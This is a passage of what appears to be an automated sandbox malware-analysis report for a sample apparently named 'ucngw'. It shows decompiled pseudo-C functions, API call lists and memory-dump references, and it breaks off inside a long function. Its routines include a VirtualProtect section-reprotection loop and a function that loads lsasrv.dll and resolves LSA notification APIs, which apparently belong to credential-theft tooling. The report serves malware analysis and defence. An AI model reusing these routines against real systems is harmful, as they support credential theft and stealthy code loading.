    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd
    Function 100068C6, Relevance: 1.6, APIs: 1, Instructions: 65library
    C-Code - Quality: 90%
    			E100068C6(signed int _a4, CHAR* _a8, intOrPtr* _a12, intOrPtr _a16) {
				struct HINSTANCE__* _t13;
				signed int* _t20;
				signed int _t27;
				signed int _t28;
				signed int _t29;
				signed int _t33;
				intOrPtr* _t34;

				_t20 = 0x1001edd8 + _a4 * 4;
				_t27 =  *0x1001d018; // 0x26c1db24
				_t29 = _t28 | 0xffffffff;
				_t33 = _t27 ^  *_t20;
				asm("ror esi, cl");
				if(_t33 == _t29) {
					L14:
					return 0;
				}
				if(_t33 == 0) {
					_t34 = _a12;
					if(_t34 == _a16) {
						L7:
						_t13 = 0;
						L8:
						if(_t13 == 0) {
							L13:
							_push(0x20);
							asm("ror edi, cl");
							 *_t20 = _t29 ^ _t27;
							goto L14;
						}
						_t33 = GetProcAddress(_t13, _a8);
						if(_t33 == 0) {
							_t27 =  *0x1001d018; // 0x26c1db24
							goto L13;
						}
						 *_t20 = E10001371(_t33);
						goto L2;
					} else {
						goto L4;
					}
					while(1) {
						L4:
						_t13 = E10006962( *_t34); // executed
						if(_t13 != 0) {
							break;
						}
						_t34 = _t34 + 4;
						if(_t34 != _a16) {
							continue;
						}
						_t27 =  *0x1001d018; // 0x26c1db24
						goto L7;
					}
					_t27 =  *0x1001d018; // 0x26c1db24
					goto L8;
				}
				L2:
				return _t33;
			}










    0x100068d1
    0x100068da
    0x100068e0
    0x100068ea
    0x100068ec
    0x100068f0
    0x1000695b
    0x00000000
    0x1000695b
    0x100068f4
    0x100068fa
    0x10006900
    0x1000691c
    0x1000691c
    0x1000691e
    0x10006920
    0x1000694b
    0x1000694d
    0x10006955
    0x10006959
    0x00000000
    0x10006959
    0x1000692c
    0x10006930
    0x10006945
    0x00000000
    0x10006945
    0x10006939
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x10006902
    0x10006902
    0x10006904
    0x1000690c
    0x00000000
    0x00000000
    0x1000690e
    0x10006914
    0x00000000
    0x00000000
    0x10006916
    0x00000000
    0x10006916
    0x1000693d
    0x00000000
    0x1000693d
    0x100068f6
    0x00000000

    APIs
    • GetProcAddress.KERNEL32(00000000,00000001,00000001,00000000,?,?,10006CE0,00000008,GetCurrentPackageId,10016C18,GetCurrentPackageId,00000000,?,?,?,100051C5), ref: 10006926
      • Part of subcall function 10006962: LoadLibraryExW.KERNELBASE(?,00000000,00000800,?,?,00000001,?,10006909,?,00000001,00000000,?,?,10006CE0,00000008,GetCurrentPackageId), ref: 10006994
      • Part of subcall function 10006962: GetLastError.KERNEL32(?,10006909,?,00000001,00000000,?,?,10006CE0,00000008,GetCurrentPackageId,10016C18,GetCurrentPackageId,00000000), ref: 100069A0
      • Part of subcall function 10006962: LoadLibraryExW.KERNEL32(?,00000000,00000000,?,10006909,?,00000001,00000000,?,?,10006CE0,00000008,GetCurrentPackageId,10016C18,GetCurrentPackageId,00000000), ref: 100069AE
      • Part of subcall function 10006962: FreeLibrary.KERNEL32(00000000,?,10006909,?,00000001,00000000,?,?,10006CE0,00000008,GetCurrentPackageId,10016C18,GetCurrentPackageId,00000000), ref: 100069D0
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
    Function 00C60830, Relevance: 1.6, APIs: 1, Instructions: 63
    C-Code - Quality: 96%
    			E00C60830(void* __ecx) {
				long _v8;
				signed int _t15;
				signed int _t17;
				long _t18;
				int _t21;
				void* _t26;
				void* _t32;
				intOrPtr _t36;
				unsigned int* _t38;

				_push(__ecx);
				_t26 = __ecx;
				_t32 = 0;
				_t36 =  *((intOrPtr*)(__ecx + 0x138));
				if(0 >=  *((intOrPtr*)(__ecx + 0x46))) {
					L13:
					return 0;
				} else {
					_t38 = _t36 + 0x24;
					do {
						_t15 =  *_t38;
						if((_t15 & 0x00000020) != 0) {
							 *_t38 = _t15 | 0x60000000;
						}
						_t17 =  *_t38 >> 0x1d;
						if(_t17 > 6) {
							L10:
							_t18 = 0x40;
						} else {
							switch( *((intOrPtr*)(_t17 * 4 +  &M00C608D0))) {
								case 0:
									goto L11;
								case 1:
									_t18 = 0x10;
									goto L11;
								case 2:
									goto L11;
								case 3:
									goto L11;
								case 4:
									goto L10;
							}
						}
						L11:
						_v8 = _t18;
						_t21 = VirtualProtect( *((intOrPtr*)(_t38 - 0x18)) +  *((intOrPtr*)(_t26 + 0x144)),  *(_t38 - 0x1c), _t18,  &_v8); // executed
						if(_t21 == 0) {
							return 9;
						} else {
							goto L12;
						}
						goto L15;
						L12:
						_t32 = _t32 + 1;
						_t38 =  &(_t38[0xa]);
					} while (_t32 < ( *(_t26 + 0x46) & 0x0000ffff));
					goto L13;
				}
				L15:
			}












    0x00c60833
    0x00c60835
    0x00c6083b
    0x00c6083d
    0x00c60847
    0x00c608ba
    0x00c608c2
    0x00c60849
    0x00c60849
    0x00c60850
    0x00c60850
    0x00c60854
    0x00c6085b
    0x00c6085b
    0x00c6085f
    0x00c60865
    0x00c6088a
    0x00c6088a
    0x00c60867
    0x00c60867
    0x00000000
    0x00000000
    0x00000000
    0x00c6086e
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00c60867
    0x00c6088f
    0x00c60892
    0x00c608a4
    0x00c608ac
    0x00c608ce
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00c608ae
    0x00c608b2
    0x00c608b3
    0x00c608b6
    0x00000000
    0x00c60850
    0x00000000

    APIs
    • VirtualProtect.KERNELBASE(?,000000FE,00000040,00C60629,00000000,00C60478,?,?,?,00C60629), ref: 00C608A4
    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd
    Function 00C5623C, Relevance: 1.5, APIs: 1, Instructions: 39
    C-Code - Quality: 95%
    			E00C5623C(void* __ecx, signed int _a4, signed int _a8) {
				void* _t8;
				void* _t12;
				signed int _t13;
				void* _t15;
				signed int _t18;
				long _t19;

				_t15 = __ecx;
				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0xc6b498, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E00C55B23();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E00C56312())) = 0xc;
							__eflags = 0;
							return 0;
						}
						_t12 = E00C54EFB(_t15, __eflags, _t19);
						_pop(_t15);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}









    0x00c5623c
    0x00c56242
    0x00c56247
    0x00c56255
    0x00c56255
    0x00c5625b
    0x00c5625d
    0x00c5625d
    0x00c56274
    0x00c5627d
    0x00c56285
    0x00000000
    0x00000000
    0x00c56265
    0x00c56267
    0x00c56289
    0x00c5628e
    0x00c56294
    0x00000000
    0x00c56294
    0x00c5626a
    0x00c5626f
    0x00c56270
    0x00c56272
    0x00000000
    0x00000000
    0x00c56272
    0x00000000
    0x00c56274
    0x00c5624d
    0x00c56253
    0x00000000
    0x00000000
    0x00000000

    APIs
    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00C58055,00000001,00000364,?,00C534C0,?,?,1FFFFFFF,?,?,00C51EFE,00C51FCA), ref: 00C5627D
    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd
    Function 00C561AB, Relevance: 1.5, APIs: 1, Instructions: 32
    C-Code - Quality: 94%
    			E00C561AB(void* __ecx, long _a4) {
				void* _t4;
				void* _t6;
				void* _t7;
				long _t8;

				_t7 = __ecx;
				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E00C56312())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0xc6b498, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E00C55B23();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E00C54EFB(_t7, __eflags, _t8);
					_pop(_t7);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}







    0x00c561ab
    0x00c561b1
    0x00c561b7
    0x00c561e9
    0x00c561ee
    0x00c561f4
    0x00000000
    0x00c561f4
    0x00c561bb
    0x00c561bd
    0x00c561bd
    0x00c561d4
    0x00c561dd
    0x00c561e5
    0x00000000
    0x00000000
    0x00c561c5
    0x00c561c7
    0x00000000
    0x00000000
    0x00c561ca
    0x00c561cf
    0x00c561d0
    0x00c561d2
    0x00000000
    0x00000000
    0x00c561d2
    0x00000000

    APIs
    • RtlAllocateHeap.NTDLL(00000000,00C51FCA,?,?,00C534C0,?,?,1FFFFFFF,?,?,00C51EFE,00C51FCA,?,?,?,?), ref: 00C561DD
    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd
    Function 10005DA1, Relevance: 1.5, APIs: 1, Instructions: 32
    C-Code - Quality: 94%
    			E10005DA1(void* __ecx, long _a4) {
				void* __esi;
				void* _t4;
				void* _t6;
				void* _t7;
				void* _t8;
				long _t9;

				_t7 = __ecx;
				_t9 = _a4;
				if(_t9 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E100068B3())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t9 == 0) {
					_t9 = _t9 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x1001f1ec, 0, _t9); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E1000A0C4();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E10009C69(_t7, _t8, _t9, __eflags, _t9);
					_pop(_t7);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}









    0x10005da1
    0x10005da7
    0x10005dad
    0x10005ddf
    0x10005de4
    0x10005dea
    0x00000000
    0x10005dea
    0x10005db1
    0x10005db3
    0x10005db3
    0x10005dca
    0x10005dd3
    0x10005ddb
    0x00000000
    0x00000000
    0x10005dbb
    0x10005dbd
    0x00000000
    0x00000000
    0x10005dc0
    0x10005dc5
    0x10005dc6
    0x10005dc8
    0x00000000
    0x00000000
    0x10005dc8
    0x00000000

    APIs
    • RtlAllocateHeap.NTDLL(00000000,00000001,00000004,?,1000DDBB,00000001,00000000,?,10009B15,00000001,00000004,00000000,00000001,?,?,10005AA6), ref: 10005DD3
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
    Function 10011140, Relevance: 1.5, APIs: 1, Instructions: 21
    C-Code - Quality: 16%
    			E10011140(void* __eflags) {
				intOrPtr* _t4;
				void* _t5;
				void* _t6;
				intOrPtr* _t7;

				E10013E20(_t5, __eflags); // executed
				__imp__RtlGetNtVersionNumbers(0x1001f384, 0x1001f3cc, 0x1001f388);
				 *0x1001f388 =  *0x1001f388 & 0x00003fff;
				_t7 = 0x1001a6e0;
				_t6 = 2;
				do {
					_t4 =  *((intOrPtr*)( *_t7 + 0x14));
					if(_t4 != 0) {
						_t4 =  *_t4();
					}
					_t7 = _t7 + 4;
					_t6 = _t6 - 1;
				} while (_t6 != 0);
				return _t4;
			}







    0x10011142
    0x10011156
    0x1001115c
    0x10011166
    0x1001116b
    0x10011170
    0x10011172
    0x10011177
    0x10011179
    0x10011179
    0x1001117b
    0x1001117e
    0x1001117e
    0x10011185

    APIs
      • Part of subcall function 10013E20: LoadLibraryW.KERNEL32(advapi32.dll), ref: 10013E35
      • Part of subcall function 10013E20: LoadLibraryW.KERNEL32(user32.dll), ref: 10013E3C
    • RtlGetNtVersionNumbers.NTDLL(1001F384,1001F3CC,1001F388), ref: 10011156
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd

    Non-executed Functions

    Function 100114D0, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146library
    C-Code - Quality: 93%
    			E100114D0() {
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				intOrPtr _v52;
				void* _v60;
				char _v68;
				signed int _v72;
				_Unknown_base(*)()* _v76;
				char _v84;
				intOrPtr _t38;
				void* _t43;
				signed int _t49;
				long* _t50;
				void* _t51;
				void* _t52;
				void** _t53;
				void** _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				_Unknown_base(*)()* _t57;
				intOrPtr _t58;
				_Unknown_base(*)()* _t59;
				void* _t61;
				struct HINSTANCE__* _t64;
				signed int _t65;
				intOrPtr _t67;
				void** _t68;
				void** _t72;
				void** _t77;
				signed int _t82;
				signed int _t84;
				void* _t86;
				void* _t87;

				_t86 = (_t84 & 0xfffffff8) - 0x48;
				_v72 = 0x1001f2d0;
				_v76 =  &_v68;
				_t38 =  *0x1001d814; // 0xc0000225
				if(_t38 >= 0) {
					L24:
					return _t38;
				} else {
					if( *0x1001f228 != 0) {
						L3:
						_v44 = 0;
						_v52 =  &_v60;
						_v48 =  &_v24;
						RtlInitUnicodeString( &_v60, L"lsasrv.dll");
						_push( &_v60);
						_t65 = 0x1001f2d0;
						_t43 = E100148C0(0x1001f2d0, E100146A0);
						_t87 = _t86 + 4;
						if(_t43 < 0 || _v52 == 0) {
							goto L23;
						} else {
							_t82 = 0;
							_v48 = _v32;
							_v44 = _v28;
							_v40 = _v24;
							if( *0x1001f388 == 0xece) {
								if(_v20 != 0x49901640) {
									_t65 = 1;
									_t82 =  <=  ? 1 : 0;
								} else {
									_t82 = 1;
								}
							}
							if( *0x1001f220 != 0) {
								L16:
								_push(_t65);
								_v84 = 0x1001d808;
								_push( &_v48);
								if(E10014190( &_v84, 9) == 0) {
									goto L23;
								} else {
									_t49 = _v36;
									_t67 =  *((intOrPtr*)(_t49 + 0x19 + _t82 * 4));
									_t77 =  *(_t49 + 9);
									_t72 =  *(_t49 - 4);
									_t50 =  *(_t49 + 0x39 + _t82 * 8);
									 *0x1001f334 = _t67;
									 *0x1001f330 = _t77;
									 *0x1001f338 = _t72;
									 *0x1001f33c = _t50;
									if(_t67 == 0 || _t77 == 0 || _t72 == 0 || _t50 == 0) {
										goto L23;
									} else {
										 *_t50 = 0x100;
										_t51 = LocalAlloc(0x40, 0x100);
										_t68 =  *0x1001f330; // 0x0
										 *_t68 = _t51;
										_t52 = LocalAlloc(0x40, 0x90);
										_t53 =  *0x1001f338; // 0x0
										 *_t53 = _t52;
										_t54 =  *0x1001f330; // 0x0
										if( *_t54 == 0) {
											goto L23;
										} else {
											_t55 =  *0x1001d814; // 0xc0000225
											_t56 =  !=  ? 0 : _t55;
											 *0x1001d814 = _t56;
											return _t56;
										}
									}
								}
							} else {
								_t57 = GetProcAddress( *0x1001f228, "LsaICancelNotification");
								_v72 = _t57;
								if(_t57 == 0) {
									L14:
									_t58 =  *0x1001f220; // 0x0
								} else {
									_t59 = GetProcAddress( *0x1001f228, "LsaIRegisterNotification");
									_v76 = _t59;
									if(_t59 == 0) {
										goto L14;
									} else {
										_push(_t65);
										_push( &_v48);
										_t65 =  &_v84;
										_t61 = E10014190(_t65, 8);
										_t87 = _t87 + 8;
										if(_t61 == 0) {
											goto L14;
										} else {
											_t65 = _v36;
											 *0x1001f224 =  *((intOrPtr*)(_t65 + 0x6c));
											_t58 =  *((intOrPtr*)(_t65 + 0x70));
											 *0x1001f220 = _t58;
										}
									}
								}
								if(_t58 == 0) {
									goto L23;
								} else {
									goto L16;
								}
							}
						}
					} else {
						_t64 = LoadLibraryW(L"lsasrv");
						 *0x1001f228 = _t64;
						if(_t64 == 0) {
							L23:
							_t38 =  *0x1001d814; // 0xc0000225
							goto L24;
						} else {
							goto L3;
						}
					}
				}
			}









































    0x100114d6
    0x100114dd
    0x100114e5
    0x100114e8
    0x100114f1
    0x100116dd
    0x100116e2
    0x100114f7
    0x100114fe
    0x10011518
    0x1001151c
    0x10011524
    0x1001152c
    0x1001153a
    0x10011549
    0x1001154a
    0x1001154f
    0x10011554
    0x10011559
    0x00000000
    0x1001156a
    0x1001156e
    0x1001157a
    0x10011582
    0x1001158a
    0x1001158e
    0x10011599
    0x100115a7
    0x100115ac
    0x1001159b
    0x1001159b
    0x1001159b
    0x10011599
    0x100115b6
    0x10011626
    0x10011626
    0x1001162b
    0x10011633
    0x10011647
    0x00000000
    0x1001164d
    0x1001164d
    0x10011651
    0x10011655
    0x10011658
    0x1001165b
    0x1001165f
    0x10011665
    0x1001166b
    0x10011671
    0x10011678
    0x00000000
    0x10011686
    0x1001168d
    0x10011693
    0x10011699
    0x100116a6
    0x100116a8
    0x100116b0
    0x100116b5
    0x100116b7
    0x100116bf
    0x00000000
    0x100116c1
    0x100116c1
    0x100116ca
    0x100116cd
    0x100116d7
    0x100116d7
    0x100116bf
    0x10011678
    0x100115b8
    0x100115c9
    0x100115cb
    0x100115d1
    0x10011619
    0x10011619
    0x100115d3
    0x100115de
    0x100115e0
    0x100115e6
    0x00000000
    0x100115e8
    0x100115e8
    0x100115f2
    0x100115f3
    0x100115f7
    0x100115fc
    0x10011601
    0x00000000
    0x10011603
    0x10011603
    0x1001160a
    0x1001160f
    0x10011612
    0x10011612
    0x10011601
    0x100115e6
    0x10011620
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x10011620
    0x100115b6
    0x10011500
    0x10011505
    0x1001150b
    0x10011512
    0x100116d8
    0x100116d8
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x10011512
    0x100114fe

    APIs
    • LoadLibraryW.KERNEL32(lsasrv), ref: 10011505
    • RtlInitUnicodeString.NTDLL(?,lsasrv.dll), ref: 1001153A
      • Part of subcall function 100148C0: LocalFree.KERNEL32(?), ref: 10014976
      • Part of subcall function 100148C0: LocalAlloc.KERNEL32(00000040,?), ref: 10014A6F
      • Part of subcall function 100148C0: LocalFree.KERNEL32(?), ref: 10014ABD
      • Part of subcall function 100148C0: RtlInitUnicodeString.NTDLL(?,00000000), ref: 10014B53
      • Part of subcall function 100148C0: LocalFree.KERNEL32(?), ref: 10014B77
    • GetProcAddress.KERNEL32(LsaICancelNotification), ref: 100115C9
    • GetProcAddress.KERNEL32(LsaIRegisterNotification), ref: 100115DE
      • Part of subcall function 10014190: LocalAlloc.KERNELBASE(00000040,00001001,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 10014277
      • Part of subcall function 10014190: GlobalFree.KERNELBASE(?,?,?,00001DB1), ref: 100142C7
      • Part of subcall function 10014190: LocalFree.KERNEL32(?,00001DB1), ref: 100142EA
    • LocalAlloc.KERNEL32(00000040,00000100), ref: 10011693
    • LocalAlloc.KERNEL32(00000040,00000090), ref: 100116A8
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
    Function 1000B61E, Relevance: 6.4, Strings: 4, Instructions: 1381Crypto
    C-Code - Quality: 77%
    			E1000B61E(void* __ebx, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr* _a16, signed int _a20, intOrPtr _a24) {
				signed int _v0;
				signed int _v8;
				char _v460;
				signed int _v464;
				void _v468;
				signed int _v472;
				signed int _v932;
				signed int _v936;
				signed int _v1392;
				signed int _v1396;
				signed int _v1400;
				char _v1860;
				signed int _v1864;
				signed int _v1865;
				signed int _v1872;
				signed int _v1876;
				signed int _v1880;
				signed int _v1884;
				signed int _v1888;
				signed int _v1892;
				signed int _v1896;
				intOrPtr _v1900;
				signed int _v1904;
				signed int _v1908;
				signed int _v1912;
				signed int _v1916;
				signed int _v1920;
				signed int _v1924;
				signed int _v1928;
				char _v1936;
				char _v1944;
				char _v2404;
				signed int _v2408;
				signed int _v2424;
				void* __edi;
				void* __esi;
				signed int _t725;
				signed int _t735;
				signed int _t736;
				signed int _t740;
				intOrPtr _t742;
				intOrPtr* _t743;
				intOrPtr* _t746;
				signed int _t751;
				signed int _t752;
				signed int _t758;
				signed int _t764;
				intOrPtr _t766;
				void* _t767;
				signed int _t768;
				signed int _t769;
				signed int _t770;
				signed int _t778;
				signed int _t779;
				signed int _t782;
				signed int _t783;
				signed int _t784;
				signed int _t787;
				signed int _t788;
				signed int _t789;
				signed int _t791;
				signed int _t792;
				signed int _t793;
				signed int _t794;
				signed int _t799;
				signed int _t800;
				signed int _t805;
				signed int _t806;
				signed int _t809;
				signed int _t813;
				signed int _t820;
				signed int* _t823;
				signed int _t826;
				signed int _t837;
				signed int _t838;
				signed int _t840;
				char* _t841;
				signed int _t843;
				signed int _t847;
				signed int _t848;
				signed int _t852;
				signed int _t854;
				signed int _t859;
				signed int _t867;
				signed int _t870;
				signed int _t872;
				signed int _t875;
				signed int _t876;
				signed int _t877;
				signed int _t880;
				signed int _t893;
				signed int _t894;
				signed int _t896;
				char* _t897;
				signed int _t899;
				signed int _t903;
				signed int _t904;
				signed int* _t906;
				signed int _t908;
				signed int _t910;
				signed int _t915;
				signed int _t922;
				signed int _t925;
				signed int _t929;
				signed int* _t936;
				intOrPtr _t938;
				void* _t939;
				intOrPtr* _t941;
				signed int* _t945;
				unsigned int _t956;
				signed int _t957;
				void* _t960;
				signed int _t961;
				void* _t963;
				signed int _t964;
				signed int _t965;
				signed int _t966;
				signed int _t974;
				signed int _t979;
				signed int _t982;
				unsigned int _t985;
				signed int _t986;
				void* _t989;
				signed int _t990;
				void* _t992;
				signed int _t993;
				signed int _t994;
				signed int _t995;
				signed int _t999;
				signed int* _t1004;
				signed int _t1006;
				signed int _t1016;
				void _t1019;
				signed int _t1022;
				void* _t1025;
				signed int _t1036;
				signed int _t1037;
				signed int _t1040;
				signed int _t1041;
				signed int _t1043;
				signed int _t1044;
				signed int _t1045;
				signed int _t1049;
				signed int _t1053;
				signed int _t1054;
				signed int _t1055;
				signed int _t1057;
				signed int _t1058;
				signed int _t1059;
				signed int _t1060;
				signed int _t1061;
				signed int _t1062;
				signed int _t1064;
				signed int _t1065;
				signed int _t1066;
				signed int _t1067;
				signed int _t1068;
				signed int _t1069;
				unsigned int _t1070;
				void* _t1073;
				intOrPtr _t1075;
				signed int _t1076;
				signed int _t1077;
				signed int _t1078;
				signed int* _t1082;
				void* _t1086;
				void* _t1087;
				signed int _t1088;
				signed int _t1089;
				signed int _t1090;
				signed int _t1093;
				signed int _t1094;
				signed int _t1099;
				signed int _t1101;
				signed int _t1104;
				char _t1109;
				signed int _t1111;
				signed int _t1112;
				signed int _t1113;
				signed int _t1114;
				signed int _t1115;
				signed int _t1116;
				signed int _t1117;
				signed int _t1121;
				signed int _t1122;
				signed int _t1123;
				signed int _t1124;
				signed int _t1125;
				unsigned int _t1128;
				void* _t1132;
				void* _t1133;
				unsigned int _t1134;
				signed int _t1139;
				signed int _t1140;
				signed int _t1142;
				signed int _t1143;
				intOrPtr* _t1145;
				signed int _t1146;
				signed int _t1147;
				signed int _t1150;
				signed int _t1151;
				signed int _t1154;
				signed int _t1156;
				signed int _t1157;
				void* _t1158;
				signed int _t1159;
				signed int _t1160;
				signed int _t1161;
				void* _t1164;
				signed int _t1165;
				signed int _t1166;
				signed int _t1167;
				signed int _t1168;
				signed int _t1169;
				signed int* _t1172;
				signed int _t1173;
				signed int _t1174;
				signed int _t1175;
				signed int _t1176;
				intOrPtr* _t1178;
				intOrPtr* _t1179;
				signed int _t1181;
				signed int _t1183;
				signed int _t1186;
				signed int _t1192;
				signed int _t1196;
				signed int _t1197;
				intOrPtr _t1199;
				intOrPtr _t1200;
				signed int _t1205;
				signed int _t1208;
				signed int _t1209;
				signed int _t1210;
				signed int _t1211;
				signed int _t1212;
				signed int _t1213;
				signed int _t1215;
				signed int _t1216;
				signed int _t1217;
				signed int _t1218;
				signed int _t1220;
				signed int _t1221;
				signed int _t1222;
				signed int _t1223;
				signed int _t1224;
				signed int _t1226;
				signed int _t1227;
				signed int _t1229;
				signed int _t1231;
				signed int _t1233;
				signed int _t1235;
				signed int* _t1237;
				signed int* _t1241;
				signed int _t1250;

				_t725 =  *0x1001d018; // 0x26c1db24
				_v8 = _t725 ^ _t1235;
				_t1016 = _a20;
				_t1145 = _a16;
				_v1924 = _t1145;
				_v1920 = _t1016;
				E1000B5F4( &_v1944, __eflags);
				_t1196 = _a8;
				_t730 = 0x2d;
				if((_t1196 & 0x80000000) == 0) {
					_t730 = 0x120;
				}
				 *_t1145 = _t730;
				 *((intOrPtr*)(_t1145 + 8)) = _t1016;
				_t1146 = _a4;
				if((_t1196 & 0x7ff00000) != 0) {
					L5:
					_t735 = E10007D68( &_a4);
					_pop(_t1031);
					__eflags = _t735;
					if(_t735 != 0) {
						_t1031 = _v1924;
						 *((intOrPtr*)(_v1924 + 4)) = 1;
					}
					_t736 = _t735 - 1;
					__eflags = _t736;
					if(_t736 == 0) {
						_push("1#INF");
						goto L308;
					} else {
						_t751 = _t736 - 1;
						__eflags = _t751;
						if(_t751 == 0) {
							_push("1#QNAN");
							goto L308;
						} else {
							_t752 = _t751 - 1;
							__eflags = _t752;
							if(_t752 == 0) {
								_push("1#SNAN");
								goto L308;
							} else {
								__eflags = _t752 == 1;
								if(_t752 == 1) {
									_push("1#IND");
									goto L308;
								} else {
									_v1928 = _v1928 & 0x00000000;
									_a4 = _t1146;
									_a8 = _t1196 & 0x7fffffff;
									_t1250 = _a4;
									asm("fst qword [ebp-0x768]");
									_t1150 = _v1896;
									_v1916 = _a12 + 1;
									_t1036 = _t1150 >> 0x14;
									_t758 = _t1036 & 0x000007ff;
									__eflags = _t758;
									if(_t758 != 0) {
										_t1101 = 0;
										_t758 = 0;
										__eflags = 0;
									} else {
										_t1101 = 1;
									}
									_t1151 = _t1150 & 0x000fffff;
									_t1019 = _v1900 + _t758;
									asm("adc edi, esi");
									__eflags = _t1101;
									_t1037 = _t1036 & 0x000007ff;
									_t1205 = _t1037 - 0x434 + (0 | _t1101 != 0x00000000) + 1;
									_v1872 = _t1205;
									E1000E330(_t1037, _t1250);
									_push(_t1037);
									_push(_t1037);
									 *_t1237 = _t1250;
									_t764 = E10010280(E1000E440(_t1151, _t1205), _t1250);
									_v1904 = _t764;
									__eflags = _t764 - 0x7fffffff;
									if(_t764 == 0x7fffffff) {
										L16:
										__eflags = 0;
										_v1904 = 0;
									} else {
										__eflags = _t764 - 0x80000000;
										if(_t764 == 0x80000000) {
											goto L16;
										}
									}
									_v468 = _t1019;
